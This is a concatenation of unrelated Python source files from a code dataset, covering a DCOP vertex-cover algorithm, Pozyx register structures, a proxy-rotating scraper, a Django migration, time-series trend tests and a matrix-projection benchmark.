        self.msgs = {u: {v: np.asarray([0, 0]) for v in self.ccg.neighbors(u)}
                     for u in self.ccg.nodes()}
        # The lexicographically smallest agent acts as the centralized root.
        self.root = min([aname for aname in dcop_instance.agents])
        self.variables = dcop_instance.variables.values()
        # For each variable, the CCG nodes (and their ranks) that encode it.
        self.var_ccg_nodes = {vname: [(u, data['rank'])
                                      for u, data in self.ccg.nodes(data=True)
                                      if ('variable' in data and data['variable'] == vname)]
                              for vname in dcop_instance.variables}

    def onStart(self, agt):
        # agt.setRandomAssignment()
        # Randomize the initial messages to break symmetry.
        self.msgs = {u: {v: self.prng.randint(10, size=2)
                         for v in self.ccg.neighbors(u)} for u in self.ccg.nodes()}
        # BUGFIX: compare agent names with ==, not the identity operator `is`,
        # which is unreliable for strings (it only works via CPython interning).
        if agt.name == self.root:
            for var in self.variables:
                v_val = var.value
                # Put the node matching the current value at 0 and all others at 1.
                vc = []
                for (u, r) in self.var_ccg_nodes[var.name]:
                    if v_val == 0 or v_val != 0 and r != v_val:
                        vc.append(u)
                set_var_value(var, vc, self.var_ccg_nodes[var.name], self.prng)

    def onCycleStart(self, agt):
        pass

    def onCurrentCycle(self, agt):
        # Only the root performs the (centralized) message updates.
        if agt.name != self.root:
            return
        ccg = self.ccg
        weights = nx.get_node_attributes(ccg, 'weight')
        for u in ccg.nodes():
            # Sum all incoming messages at u.
            # BUGFIX: use the builtin sum over the generator; np.sum(<generator>)
            # is deprecated and rejected by recent NumPy releases.
            sum_msgs = sum(self.msgs[t][u] for t in ccg.neighbors(u))
            # Send messages to neighbors.
            for v in ccg.neighbors(u):
                sum_without_v = sum_msgs - self.msgs[v][u]
                m = np.asarray([weights[u] + sum_without_v[1],
                                min(sum_without_v[0], sum_without_v[1] + weights[u])])
                # Normalize values.
                m -= np.min(m)  # m -= np.mean(m)
                # Add noise to help stabilize convergence.
                m += self.prng.normal(scale=1, size=len(m))
                # Damping blends the new message with the previous one.
                if self.damping > 0:
                    m = self.damping * self.msgs[u][v] + (1 - self.damping) * m
                # NOTE(review): counter presumably initialized by the Algorithm
                # base class — confirm.
                self.num_messages_sent += 1
                self.msgs[u][v] = m

    def onCycleEnd(self, agt):
        if agt.name != self.root:
            return
        ccg = self.ccg
        weights = nx.get_node_attributes(ccg, 'weight')
        vertex_cover = []
        for u in ccg.nodes():
            # BUGFIX: builtin sum instead of np.sum over a generator (see above).
            sum_msgs = sum(self.msgs[t][u] for t in ccg.neighbors(u))
            # u joins the cover when excluding it is costlier than including it.
            if sum_msgs[0] > sum_msgs[1] + weights[u]:
                vertex_cover.append(u)
        for var in self.variables:
            set_var_value(var, vertex_cover, self.var_ccg_nodes[var.name], self.prng)

    def onTermination(self, agt):
        pass
| StarcoderdataPython |
6623241 | <filename>Backend/Pozyx/pypozyx/structures/generic.py
#!/usr/bin/env python
# TODO move this in the RST files.
"""
pypozyx.structures.generic - introduces generic data structures derived from ByteStructure
Generic Structures
As the name implies, contains generic structures whose specific use is up to the
user. You should use SingleRegister where applicable when reading/writing
a single register, and use Data for larger data structures.
Structures contained:
Data
THE generic data structure, a powerful way of constructing arbitrarily
formed packed data structures
XYZ
A generic XYZ data structure that is used in much 3D sensor data
SingleRegister
Data resembling a single register. Can choose size and whether signed.
UniformData
A variation on Data with all data being a uniform format. Questionably useful.
The use of Data:
Data creates a packed data structure with size and format that is entirely the user's choice.
The format follows the one used in struct, where b is a byte, h is a 2-byte int, and
i is a default-sized integer, and f is a float. In capitals, these are signed.
So, to create a custom construct consisting of 4 uint16 and a single int, the
following code can be used.
>>> d = Data([0] * 5, 'HHHHi')
or
>>> data_format = 'HHHHi'
>>> d = Data([0] * len(data_format), data_format)
"""
from pypozyx.structures.byte_structure import ByteStructure
def is_reg_readable(reg):
    """Return True when *reg* is a readable Pozyx register address."""
    readable_ranges = (
        (0x00, 0x06),
        (0x10, 0x11),
        (0x14, 0x24),
        (0x26, 0x2A),
        (0x30, 0x47),
        (0x4E, 0x88),
    )
    return any(low <= reg <= high for low, high in readable_ranges)
def is_reg_writable(reg):
    """Return True when *reg* is a writable Pozyx register address."""
    writable_ranges = (
        (0x10, 0x11),
        (0x14, 0x24),
        (0x26, 0x2A),
        (0x30, 0x3B),
        (0x85, 0x88),
    )
    return any(low <= reg <= high for low, high in writable_ranges)
def is_functioncall(reg):
    """Return True when *reg* is a Pozyx function-call register address."""
    function_ranges = (
        (0xB0, 0xBC),
        (0xC0, 0xC8),
    )
    return any(low <= reg <= high for low, high in function_ranges)
def dataCheck(data):
    """Return True when *data* is one of the ByteStructure-derived classes.

    Checks the immediate base classes of ``type(data)`` (plus ``Data`` itself),
    so both library structures and user classes derived from them pass. This
    lets library calls accept either a raw int/list or the intended structure,
    e.g.::

        >>> p.setCoordinates([0, 0, 0])
        >>> # or
        >>> coords = Coordinates()
        >>> p.setCoordinates(coords)

    Note that this only works for setters; reads still require passing the
    correct data structure. In your own functions you can use it the same way::

        >>> if not dataCheck(sample):  # accept a plain int as well
        >>>     sample = SingleRegister(sample)
    """
    data_type = type(data)
    bases = data_type.__bases__
    return (Data is data_type
            or Data in bases
            or ByteStructure in bases
            or XYZ in bases
            or SingleRegister in bases)
class XYZ(ByteStructure):
    """
    Generic XYZ data structure consisting of 3 integers x, y, and z.
    Not recommended to use in practice, as relevant sensor data classes are derived from this.
    """
    # Conversion factor between the raw stored value and the physical unit;
    # presumably overridden by sensor subclasses — TODO confirm.
    physical_convert = 1
    # Packed size in bytes: three 4-byte signed integers ('iii').
    byte_size = 12
    data_format = 'iii'

    def __init__(self, x=0, y=0, z=0):
        """Initializes the XYZ or XYZ-derived object."""
        # Raw (unconverted) values; the x/y/z properties apply physical_convert.
        self.data = [x, y, z]

    def load(self, data, convert=True):
        # Replace the raw data list wholesale; `convert` is accepted for
        # interface compatibility but ignored here.
        self.data = data

    def __str__(self):
        return 'X: {}, Y: {}, Z: {}'.format(self.x, self.y, self.z)

    @property
    def x(self):
        # Physical value: raw value divided by the conversion factor.
        return self.data[0] / self.physical_convert

    @x.setter
    def x(self, value):
        # Inverse of the getter: store the raw (unconverted) value.
        self.data[0] = value * self.physical_convert

    @property
    def y(self):
        return self.data[1] / self.physical_convert

    @y.setter
    def y(self, value):
        self.data[1] = value * self.physical_convert

    @property
    def z(self):
        return self.data[2] / self.physical_convert

    @z.setter
    def z(self, value):
        self.data[2] = value * self.physical_convert

    # TODO maybe use asdict()? Move to dataclasses?
    def to_dict(self):
        # Physical (converted) values keyed by axis name.
        return {
            "x": self.x,
            "y": self.y,
            "z": self.z,
        }
class Data(ByteStructure):
    """Data allows the user to define arbitrary data structures to use with Pozyx.
    The Leatherman of ByteStructure-derived classes, Data allows you to create your own
    library-compatible packed data structures. Also for empty data, this is used.
    The use of Data:
    Data creates a packed data structure with size and format that is entirely the user's choice.
    The format follows the one used in struct, where b is a byte, h is a 2-byte int, and
    i is a default-sized integer, and f is a float. In capitals, these are unsigned.
    So, to create a custom construct consisting of 4 uint16 and a single int, the
    following code can be used.
    >>> d = Data([0] * 5, 'HHHHi')
    or
    >>> data_format = 'HHHHi'
    >>> d = Data([0] * len(data_format), data_format)
    Args:
        data (optional): Data contained in the data structure. When no data_format is passed, these are assumed UInt8 values.
        data_format (optional): Custom data format for the data passed.
    """

    def __init__(self, data=None, data_format=None):
        # Default to an empty payload rather than a shared mutable default.
        if data is None:
            data = []
        self.data = data
        # Without an explicit format, treat every element as an unsigned byte.
        if data_format is None:
            data_format = 'B' * len(data)
        self.data_format = data_format
        # set_packed_size() comes from ByteStructure (not visible here);
        # presumably it derives self.byte_size from data_format — TODO confirm.
        self.set_packed_size()
        # Hex-string placeholder of the packed representation, two chars per byte.
        self.byte_data = '00' * self.byte_size

    def load(self, data, convert=True):
        # Replace the payload wholesale; `convert` is accepted for interface
        # compatibility but ignored here.
        self.data = data
class SingleRegister(Data):
    """Container for the data from a single Pozyx register.

    By default this represents a UInt8 register; used for both reading and
    writing. Size and signedness are selectable via the constructor.

    Args:
        value (optional): Value of the register.
        size (optional): Size of the register in bytes. 1, 2, or 4. Default 1.
        signed (optional): Whether the data is signed. Unsigned by default.
        print_style (optional): How __str__ renders the value. 'hex' (default),
            'bin', or anything else for decimal output.
    """
    byte_size = 1
    data_format = 'B'

    def __init__(self, value=0, size=1, signed=False, print_style='hex'):
        """Initialize the register with the given value, size and signedness.

        Raises:
            ValueError: if size is not 1, 2, or 4.
        """
        self.print_style = print_style
        if size == 1:
            data_format = 'b'
        elif size == 2:
            data_format = 'h'
        elif size == 4:
            data_format = 'i'
        else:
            raise ValueError("Size should be 1, 2, or 4")
        if not signed:
            # struct format codes are unsigned in uppercase ('b' -> 'B', ...).
            data_format = data_format.capitalize()
        Data.__init__(self, [value], data_format)

    def load(self, data, convert=True):
        # Replace the register contents (a one-element list).
        self.data = data

    @property
    def value(self):
        """The register's single value."""
        return self.data[0]

    @value.setter
    def value(self, new_value):
        self.data[0] = new_value

    def __str__(self):
        # BUGFIX: compare strings with ==, not the identity operator `is`,
        # which only worked by accident of CPython string interning and emits
        # a SyntaxWarning on modern Python.
        if self.print_style == 'hex':
            return hex(self.value).capitalize()
        elif self.print_style == 'bin':
            return bin(self.value)
        else:
            return str(self.value)

    def __eq__(self, other):
        # Registers compare equal to other registers and to plain ints.
        if type(other) == SingleRegister:
            return self.value == other.value
        elif type(other) == int:
            return self.value == other
        else:
            raise ValueError("Can't compare SingleRegister value with non-integer values or registers")

    def __le__(self, other):
        if type(other) == SingleRegister:
            return self.value <= other.value
        elif type(other) == int:
            return self.value <= other
        else:
            raise ValueError("Can't compare SingleRegister value with non-integer values or registers")

    def __lt__(self, other):
        if type(other) == SingleRegister:
            return self.value < other.value
        elif type(other) == int:
            return self.value < other
        else:
            raise ValueError("Can't compare SingleRegister value with non-integer values or registers")

    def __gt__(self, other):
        # Derived from __le__ to keep the comparison operators consistent.
        return not self.__le__(other)

    def __ge__(self, other):
        return not self.__lt__(other)
class SingleSensorValue(ByteStructure):
    """
    Generic Single Sensor Value data structure.
    Not recommended to use in practice, as relevant sensor data classes are derived from this.
    """
    # Conversion factor between raw and physical values; presumably overridden
    # by sensor subclasses — TODO confirm.
    physical_convert = 1
    # Packed size in bytes: one 4-byte signed integer ('i').
    byte_size = 4
    data_format = 'i'

    def __init__(self, value=0):
        """Initializes the XYZ or XYZ-derived object."""
        self.data = [0]
        # Note: load(convert=True) divides the value by physical_convert,
        # so `value` is treated as a raw (unconverted) reading.
        self.load([value])

    @property
    def value(self):
        # The (converted) sensor value.
        return self.data[0]

    @value.setter
    def value(self, new_value):
        self.data[0] = new_value

    def load(self, data=None, convert=True):
        # Replace the payload; when convert is truthy, scale the raw value
        # into physical units by dividing by physical_convert.
        self.data = [0] if data is None else data
        if convert:
            self.data[0] = float(self.data[0]) / self.physical_convert

    def __str__(self):
        return 'Value: {}'.format(self.value)
| StarcoderdataPython |
12819432 | <reponame>jixishi/python-Practice
# coding=utf-8
from fake_useragent import UserAgent  # install with: pip install fake-useragent
# Instantiating UserAgent needs network access; the backing site is flaky,
# so this call may take a while.
ua = UserAgent()
headers = {
    'User-Agent': ua.random  # randomized User-Agent string to disguise the client
}
import requests
def get_proxy():
    """Ask the local proxy-pool service for a proxy record (parsed JSON)."""
    response = requests.get("http://127.0.0.1:5010/get/")
    return response.json()
def delete_proxy(proxy):
    """Tell the local proxy-pool service to discard *proxy*."""
    url = "http://127.0.0.1:5010/delete/?proxy={}".format(proxy)
    requests.get(url)
def getHtml(path):
    """Fetch *path* through a proxy from the local proxy pool.

    Tries up to five times. A proxy that fails is removed from the pool and a
    fresh one is requested for the next attempt (the original kept retrying
    the same dead proxy after deleting it). Returns the requests response, or
    None when every attempt fails.
    """
    retry_count = 5
    proxy = get_proxy().get("proxy")
    while retry_count > 0:
        try:
            # Route the request through the current proxy.
            html = requests.get(path, headers=headers,
                                proxies={"http": "http://{}".format(proxy)})
            return html
        except Exception:
            retry_count -= 1
            # Drop the failing proxy from the pool...
            delete_proxy(proxy)
            # ...and pick a new one for the next attempt (bug fix).
            proxy = get_proxy().get("proxy")
    return None
| StarcoderdataPython |
3218921 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-21 02:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the KPM and OCRB budget tables."""

    initial = True

    dependencies = [
    ]

    operations = [
        # Key Performance Measures rows (see the key_performance_measures field).
        migrations.CreateModel(
            name='KPM',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('source_document', models.CharField(default='', max_length=255)),
                ('service_area', models.CharField(default='', max_length=255)),
                ('bureau', models.CharField(default='', max_length=255)),
                ('key_performance_measures', models.CharField(default='', max_length=255)),
                ('fy', models.CharField(default='', max_length=255)),
                ('budget_type', models.CharField(default='', max_length=255)),
                ('amount', models.IntegerField(blank=True, null=True)),
                ('units', models.CharField(default='', max_length=255)),
            ],
        ),
        # OCRB budget rows (acronym not expanded in source — confirm meaning).
        migrations.CreateModel(
            name='OCRB',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('source_document', models.CharField(default='', max_length=255)),
                ('service_area', models.CharField(default='', max_length=255)),
                ('bureau', models.CharField(default='', max_length=255)),
                ('budget_category', models.CharField(default='', max_length=255)),
                ('amount', models.IntegerField(blank=True, null=True)),
                ('fy', models.CharField(default='', max_length=255)),
                ('budget_type', models.CharField(default='', max_length=255)),
            ],
        ),
    ]
| StarcoderdataPython |
6465399 | <reponame>mola1129/atcoder
# Decide whether an integer z exists with X < z <= Y that separates all
# x-coordinates (strictly below z) from all y-coordinates (at or above z).
N, M, X, Y = map(int, input().split())
x = sorted(map(int, input().split()))
y = sorted(map(int, input().split()))
# x[-1] is the largest x value, y[0] the smallest y value, so one combined
# check per candidate z covers all N + M coordinates.
peace_possible = any(
    X < z <= Y and x[-1] < z <= y[0]
    for z in range(-100, 101)
)
print("No War" if peace_possible else "War")
| StarcoderdataPython |
5049184 | #!/usr/bin/env python
import unittest
from spyne.util.cdict import cdict
class A(object):
    # Root of the A -> B hierarchy; has its own entry in the cdict below.
    pass
class B(A):
    # Subclass of A: cdict lookups should fall back to A's entry.
    pass
class C(object):
    # Unrelated class with no entry of its own; falls back to `object`.
    pass
class D:
    # Declared without an explicit base. NOTE(review): under Python 3 this
    # still inherits from object, so the KeyError expectation in the test
    # below suggests this file targets Python 2 class semantics — confirm.
    pass
class TestCDict(unittest.TestCase):
    """Exercise class-keyed dict lookup with inheritance fallback."""

    def test_cdict(self):
        lookup = cdict({A: "fun", object: "base"})
        # A direct hit and an inherited hit both resolve to A's entry.
        self.assertEqual(lookup[A], 'fun')
        self.assertEqual(lookup[B], 'fun')
        # C has no entry of its own and falls back to the object entry.
        self.assertEqual(lookup[C], 'base')
        # D matches nothing, so the lookup must raise KeyError.
        with self.assertRaises(KeyError):
            lookup[D]
if __name__ == '__main__':
    # Allow running this test module directly with the unittest runner.
    unittest.main()
| StarcoderdataPython |
5094951 | <filename>io_scene_xray/xray_inject_ui.py
from .ops import fake_bones, verify_uv, verify_uv_ui, joint_limits
from . import registry
from .ui import (
obj, mesh, material, armature, bone, action,
scene, view3d, collapsible, edit_helper
)
# Register this UI module's dependencies with the add-on registry so they are
# presumably initialized/torn down together with this module — confirm against
# the registry implementation.
registry.module_requires(__name__, [
    collapsible,
    fake_bones,
    joint_limits,
    verify_uv.XRayVerifyUVOperator,
    verify_uv_ui.XRAY_PT_VerifyToolsPanel,
    obj,
    mesh,
    material,
    armature,
    bone,
    action,
    scene,
    view3d,
    edit_helper
])
| StarcoderdataPython |
3531997 |
import re
sentence = "What's the password katappa: '<PASSWORD>'!, cried katappa \nSo Bhallaldev fled"
# NOTE(review): this rebinds the builtin name `dict` to an instance;
# the builtin dict() constructor is shadowed below this line.
dict = dict()
# Strip punctuation, then whitespace escape characters.
first_sentence = re.sub(r"[,#$^&*+!:]", '', sentence)
remove1 = re.sub(r"[\n\t\r\f\v]", '', first_sentence)
dict1 = []  # all indices of single quotes
dict2 = []  # quote indices adjacent to a space (treated as quotation marks)
dict3 = []  # successive versions of the string with quotes removed
def find_indices_of(char, in_string):
    """Yield every index at which *char* occurs in *in_string*, left to right."""
    position = in_string.find(char)
    while position != -1:
        yield position
        position = in_string.find(char, position + 1)
# Collect the index of every single quote in the cleaned sentence.
for i in find_indices_of("'", remove1):
    dict1.append(i)
# Keep only quotes adjacent to a space: those are quotation marks rather than
# apostrophes. NOTE(review): a quote at the very end would make value+1 an
# out-of-range index — confirm inputs always end with other text.
for value in dict1:
    if remove1[int(value-1)] == " " or remove1[int(value + 1)] == " ":
        dict2.append(value)
i = 0
if i == 0:
    # Remove the selected quotes one by one; `i` counts removals so far and
    # compensates for the leftward shift of the remaining indices.
    for quote in dict2:
        string = remove1[:quote-i] + '' + remove1[quote+1-i:]
        remove1 = string
        dict3.append(remove1)
        i = i + 1
# NOTE(review): if no quotation marks were found, dict3 is empty and this
# indexing raises IndexError — confirm intended behavior.
final_sentence = dict3[-1]
# Count word frequencies, case-insensitively. `dict` here is the counter
# instance bound above (the builtin dict is shadowed).
for word in final_sentence.lower().split():
    if word in dict:
        dict[word] += 1
    else:
        dict[word] = 1
print(dict)
| StarcoderdataPython |
6543417 | <gh_stars>10-100
# extracts features of 1d array like data.
import numpy as np
import scipy
from scipy.stats import norm, rankdata
class Features(object):
    """Base container for 1-D array-like data whose features are computed.

    Subclasses read the observations from ``self.x``.
    """

    def __init__(self, x):
        # Store the raw observations for feature extraction by subclasses.
        self.x = x
class Trends(Features):
    """
    Trend-detection features of the wrapped 1-D data (self.x).

    Arguments:
        x array/list/series: 1d array or array like whose features are to be calculated.
    """
    def sen_slope(self, alpha=None):
        # https://github.com/USGS-python/trend/blob/master/trend/__init__.py
        """A nonparametric estimate of trend (Sen's slope, the median of all
        pairwise slopes of self.x).

        Parameters
        ----------
        alpha : float, optional
            When given, also return (lower, upper) confidence limits.

        Notes
        -----
        This method works with missing or censored data, as long as less <20% of
        observations are censored.

        NOTE(review): the upstream docstring documents a parameter ``x``, but
        this method operates on ``self.x`` — confirm intended interface.

        References
        ----------
        .. [1] <NAME> <NAME>. 2002. Statistical Methods in Water Resources.
        .. [2] https://vsp.pnnl.gov/help/vsample/nonparametric_estimate_of_trend.htm
        """
        s = sen_diff(self.x)
        s.sort()
        if alpha:
            N = len(s)
            # calculate confidence limits
            C_alpha = norm.ppf(1 - alpha / 2) * np.sqrt(np.nanvar(self.x))
            U = int(np.round(1 + (N + C_alpha) / 2))
            L = int(np.round((N - C_alpha) / 2))
            return np.nanmedian(s), s[L], s[U]
        else:
            return np.nanmedian(s)

    def seasonal_sen_slope(self, period=12, alpha=None):
        """A nonparametric estimate of trend for seasonal time series.

        Pools Sen's differences computed separately per season and returns
        their median (optionally with confidence limits).

        Paramters
        ---------
        period : int
            Number of observations in a cycle. The number of seasons.
        """
        # NOTE(review): seeding `s` with 0 leaves a spurious zero slope in the
        # pooled sample, which biases the median — likely should start from an
        # empty array; confirm.
        s = 0
        for season in np.arange(0, period):
            x_season = self.x[season::period]
            s = np.append(s, sen_diff(x_season))
        s.sort()
        if alpha:
            # XXX This code needs to be verified
            N = len(s)
            # calculate confidence limits
            C_alpha = norm.ppf(1-alpha/2)*np.sqrt(np.nanvar(self.x))
            U = int(np.round(1 + (N + C_alpha)/2))
            L = int(np.round((N - C_alpha)/2))
            return np.nanmedian(s), s[L], s[U]
        else:
            return np.nanmedian(s)

    def pettitt(self, alpha=0.05):
        """Pettitt's change-point test.

        A nonparameteric test for detecting change points in a time series.

        Parameters
        ----------
        alpha : float
            Significance level

        Return
        ------
        The index of the change point of the series, or NaN.
        """
        U_t = np.zeros_like(self.x)
        n = len(self.x)
        r = rankdata(self.x)
        # NOTE(review): the textbook Pettitt statistic is
        # U_t = 2*sum(r[:t]) - t*(n+1); here (i+1)*(n-1) is used — confirm.
        for i in np.arange(n):
            U_t[i] = 2 * np.sum(r[:i+1]) - (i+1)*(n-1)
        t = np.argmax(np.abs(U_t))
        K_t = U_t[t]
        p = 2.0 * np.exp((-6.0 * K_t**2)/(n**3 + n**2))
        # NOTE(review): the change point is returned when p > alpha, i.e. when
        # the result is NOT significant — this looks inverted relative to the
        # docstring ("provided that it is statistically significant"); confirm.
        if p > alpha:
            return t
        else:
            return np.nan

    def mann_kendall(self, alpha=0.05):
        """Mann-Kendall (MK) is a nonparametric test for monotonic trend.

        Returns
        -------
        p_value : float
            Two-tailed p-value of the normalized MK statistic.

        NOTE(review): the `alpha` parameter is accepted but unused — confirm.

        Attribution
        -----------
        Modified from code by <NAME> available at
        https://github.com/mps9506/Mann-Kendall-Trend/blob/master/mk_test.py
        """
        # n = len(self.x)
        s = mk_score(self.x)
        var_s = mk_score_variance(self.x)
        z = mk_z(s, var_s)
        # calculate the p_value
        p_value = 2*(1-norm.cdf(abs(z)))  # two tail test
        return p_value

    def seasonal_mann_kendall(self, period=12):
        """ Seasonal nonparametric test for detecting a monotonic trend.

        Sums the MK score and its variance across seasons before normalizing.

        Parameters
        ----------
        period : int
            The number of observations that define period. This is the number of seasons.
        """
        # Compute the SK statistic, S, for each season
        s = 0
        var_s = 0
        for season in np.arange(period):
            x_season = self.x[season::period]
            s += mk_score(x_season)
            var_s += mk_score_variance(x_season)
        # Compute the SK test statistic, Z, for each season.
        z = mk_z(s, var_s)
        # calculate the p_value
        p_value = 2*(1-norm.cdf(abs(z)))  # two tail test
        return p_value
def mk_z(s, var_s):
    """Normalize the Mann-Kendall S statistic into a Z score.

    Applies the standard continuity correction: S is shifted one unit toward
    zero before dividing by the standard deviation of S.

    Parameters
    ----------
    s : float
        The MK trend statistic, S.
    var_s : float
        Variance of S.

    Returns
    -------
    MK test statistic, Z (0 when S is 0).
    """
    if s == 0:
        return 0
    shift = -1 if s > 0 else 1
    return (s + shift) / np.sqrt(var_s)
def mk_score_variance(x):
    """Corrected variance of the S statistic used in Mann-Kendall tests.

    Equation 8.4 from Helsel and Hirsch (2002); NaNs are dropped first and
    tied groups reduce the variance.

    Parameters
    ----------
    x : array_like

    Returns
    -------
    Variance of the S statistic.

    References
    ----------
    .. [1] Helsel and Hirsch, R.M. 2002. Statistical Methods in Water Resources.
    """
    x = x[~np.isnan(x)]
    n = len(x)
    # Counts of each distinct value give the tie-group sizes directly.
    unique_vals, counts = np.unique(x, return_counts=True)
    base = n * (n - 1) * (2 * n + 5)
    if len(unique_vals) == n:
        # No ties: the uncorrected formula applies.
        return base / 18
    tie_correction = np.sum(counts * (counts - 1) * (2 * counts + 5))
    return (base - tie_correction) / 18
class Stats(Features):
    """Assorted summary statistics of the wrapped 1-D data (self.x)."""

    def auc(self):
        # Placeholder: not implemented yet (returns None).
        return

    def auto_corr(self):
        # Placeholder: not implemented yet (returns None).
        return

    def centroid(self):
        # Placeholder: not implemented yet (returns None).
        return

    def slope(self):
        # Placeholder: not implemented yet (returns None).
        return

    def zero_crossing_rate(self):
        # Placeholder: not implemented yet (returns None).
        return

    def sum_abs_diff(self):
        """Sum of absolute first differences (total variation) of self.x."""
        return np.sum(np.abs(np.diff(self.x)))

    def min_max_diff(self):
        """Absolute range: |max(x) - min(x)|."""
        return np.abs(np.max(self.x) - np.min(self.x))

    def mean_abs_dev(self):
        """Mean absolute deviation about the mean (along axis 0)."""
        return np.mean(np.abs(self.x - np.mean(self.x, axis=0)), axis=0)

    def median_abs_dev(self):
        """Median absolute deviation (raw, unscaled).

        BUGFIX: scipy.stats.median_absolute_deviation was deprecated in SciPy
        1.5 and removed in 1.9; median_abs_deviation with scale=1 is the exact
        replacement for the original scale=1 call.
        """
        return scipy.stats.median_abs_deviation(self.x, scale=1)

    def rms(self):
        """Root mean square of the data."""
        return np.sqrt(np.sum(np.array(self.x) ** 2) / len(self.x))
def mk_score(x):
    """Compute the S statistic used in Mann-Kendall tests.

    S counts, over all ordered pairs (i < j), the sign of x[j] - x[i];
    NaN entries are dropped first.

    Parameters
    ----------
    x : array_like
        Chronologically ordered array of observations.

    Returns
    -------
    MK trend statistic (S).
    """
    x = x[~np.isnan(x)]
    return sum(np.sum(np.sign(x[j] - x[:j])) for j in np.arange(1, len(x)))
def sen_diff(x):
    """Sen's difference operator: all pairwise slopes (x[j] - x[i]) / (j - i).

    Paramaters
    ----------
    x : array_like
        Observations taken at a fixed frequency.

    Returns
    -------
    1-D array of the n*(n-1)/2 pairwise slope estimates.
    """
    # x = x[~np.isnan(x)]
    n = len(x)
    slopes = np.zeros(int(n * (n - 1) / 2))
    pos = 0
    for j in np.arange(1, n):
        # Slopes of x[j] against every earlier point; the divisor j-i counts
        # down from j (for i=0) to 1 (for i=j-1).
        slopes[pos:pos + j] = (x[j] - x[0:j]) / np.arange(j, 0, -1)
        pos += j
    return slopes
if __name__ == "__main__":
    # Smoke test: wrap ten random samples in a Features container.
    f = Features(np.random.random(10))
| StarcoderdataPython |
361538 | <filename>pocsuite/lib/utils/sebug.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
from pocsuite.thirdparty.knowledge.webservice import Clinet
class seebugBase():
    # Placeholder for the Seebug integration; no behavior implemented yet.
    pass
| StarcoderdataPython |
3584226 | <reponame>wx100059/fast_projected_gradient_descent
# -*- coding: utf-8 -*-
"""
This algorithm compares the three different methods to compute the projection of a matrix.
"""
import matplotlib.pyplot as plt
import numpy as np
import cvxpy as cp
import time
"""
This function applies bisection algorithm to compute the project gradient descent.
Input: Y, a n times n matrix of real number.
k, the constrains the out matrix X need to obey. |X|_inf < k
Output: the matrix X that follow the rules X = argmin|X - Y|_F s.t. |X|_inf <= k
"""
def bisection(Y,k):
# transfer the original problem into argmin|X - Y|_F s.t. Y >= 0, X >=0, |X|_inf = k
Y_sgn = np.sign(Y)
abs_Y = np.abs(Y)
temp_Y = abs_Y.sum(axis = 1)
index = np.where(temp_Y > 1)
index = np.array(index)
# if |Y|_infty < k. Then directly set X = Y
if not len(index):
return Y
# solve problem argmin|X - Y|_F s.t. Y >= 0, X >=0, |X|_inf = k
Q = abs_Y[index,]
Q = np.transpose(np.squeeze(Q))
# compute the optimal value of Lagrange multiplier of the origional problem.
lambda_lower = np.zeros(len(index[0]));
lambda_upper = Q.max(axis = 0);
while np.linalg.norm(lambda_lower - lambda_upper) > 0.01:
lambda_middle = (lambda_lower + lambda_upper) / 2
temp_Q = np.maximum(Q - lambda_middle, 0)
temp_Q_sum = np.sum(temp_Q, axis = 0)
index_upper = np.where(temp_Q_sum <= k)
lambda_upper[index_upper] = lambda_middle[index_upper];
index_lower = np.where(temp_Q_sum > k)
lambda_lower[index_lower] = lambda_middle[index_lower];
Q = np.transpose(np.maximum(Q - lambda_middle,0))
X_output = np.array(Y);
X_output[index, :] = np.multiply(Q, Y_sgn[index,:]);
return X_output;
"""
This function applies bisection algorithm to compute the project gradient descent.
Input: Y, a n times n matrix of real number.
k, the constrains the out matrix X need to obey. |X|_inf < k
Output: the matrix X that follow the rules X = argmin|X - Y|_F s.t. |X|_inf <= k
"""
def order(Y,k):
# transfer the original problem into argmin|X - Y|_F s.t. Y >= 0, X >=0, |X|_inf = k
Y_sgn = np.sign(Y)
abs_Y = np.abs(Y)
temp_Y = abs_Y.sum(axis = 1)
index = np.where(temp_Y > 1)
index = np.array(index)
Q = np.squeeze(abs_Y[index,])
# solve problem argmin|X - Y|_F s.t. Y >= 0, X >=0, |X|_inf = k
size = np.shape(Q)
Q = np.squeeze(Q)
P = np.sort(Q, axis = 1)
P = np.transpose(P)
P = P[::-1]
P = np.transpose(P)
P_temp = np.matmul((k - np.cumsum(P, axis = 1)),np.diag(np.divide(1, np.arange(1,size[1]+1))))
P_lambda = P + P_temp
lambda_index = np.argmax(P_lambda < 0, axis = 1)
lambda_index = np.mod(lambda_index - 1, size[1])
P = np.transpose(np.maximum(np.transpose(Q) + P_temp[np.arange(0,size[0]),lambda_index], 0))
P_output = np.array(Y)
P_output[index,:] = np.multiply(P, Y_sgn[index,:])
return P_output
"""
This function applies cvxpy to compute the projection of a matrix on a convex set.
Input: Y, a n times n matrix of real number.
k, the constrains the out matrix X need to obey. |X|_inf < k
Output: the matrix X that follow the rules X = argmin|X - Y|_F s.t. |X|_inf <= k
"""
def cvx(Y,k):
nrow = len(Y)
ncol = len(Y[0])
X = cp.Variable((nrow, ncol))
prob = cp.Problem(cp.Minimize(cp.norm(X-Y,"fro")),[cp.norm(X,"inf") <= k])
prob.solve()
return X.value
# Benchmark: time each projection method on random n x n matrices, with n
# running from `start` (inclusive) to `end` (exclusive) in steps of `step`.
start = 10
end = 100
step = 10
length = int((end - start - 1) / step) + 1
run_time1 = np.empty(length)  # bisection-based algorithm
run_time2 = np.empty(length)  # sort (order) based algorithm
run_time3 = np.empty(length)  # cvxpy reference (currently disabled below)
matrix_size = np.arange(start, end, step)
index = 0
k = 1
for i in matrix_size:
    # Fresh random n x n matrix per size; time.perf_counter replaces
    # time.clock, which was removed in Python 3.8.
    Y = 5 * np.random.rand(i, i)
    begin_time = time.perf_counter()
    X1 = bisection(Y, k)
    run_time1[index] = time.perf_counter() - begin_time
    X2 = order(Y, k)
    run_time2[index] = time.perf_counter() - run_time1[index] - begin_time
    # X3 = cvx(Y, k)
    # run_time3[index] = time.perf_counter() - run_time2[index] - run_time1[index] - begin_time
    index = index + 1
plt.plot(matrix_size, run_time1, label='bisection')
plt.plot(matrix_size, run_time2, label='order')
#plt.plot(matrix_size, run_time3, label='cvx')
plt.xlabel('matrix size n')
plt.ylabel('run time/s')
plt.title("Run time comparision")
plt.legend()
plt.show()
9722995 | def Halo_Plot(Data):
